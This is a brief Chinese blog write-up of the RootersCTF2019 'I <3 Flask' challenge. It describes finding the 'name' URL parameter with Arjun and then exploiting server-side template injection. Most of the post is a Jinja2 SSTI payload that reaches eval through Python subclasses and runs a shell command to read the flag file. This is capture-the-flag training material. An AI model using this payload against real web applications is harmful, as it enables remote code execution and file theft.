[RootersCTF2019]I_＜3_Flask

Ushernrt

于 2021-07-27 10:21:46 发布

阅读量108

点赞数

分类专栏： BUUCTF刷题记录

本文链接：https://blog.csdn.net/qq_25500649/article/details/119134927

版权

BUUCTF刷题记录专栏收录该内容

84 篇文章 1 订阅

订阅专栏

知识点：

url参数爆破，

ssti

第一步使用 Arjun爆破url参数,爆破出来参数name

接下来就可以尝试ssti，

去网上找个payload 打一下。

{% for c in [].__class__.__base__.__subclasses__() %} 
  {% if c.__name__ == 'catch_warnings' %} 
    {% for b in c.__init__.__globals__.values() %} 
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %} 
          {{ b['eval']('__import__("os").popen("cat flag.txt").read()') }} 
            //在这里可以先执行一下ls看一下文件列表
        {% endif %} 
      {% endif %} 
     {% endfor %} 
  {% endif %}
{% endfor %}

Ushernrt

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[RootersCTF2019]I_＜3_Flask

知识点：url参数爆破，ssti第一步使用 Arjun爆破url参数,爆破出来参数name接下来就可以尝试ssti，去网上找个payload 打一下。{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% .
复制链接

扫一扫

专栏目录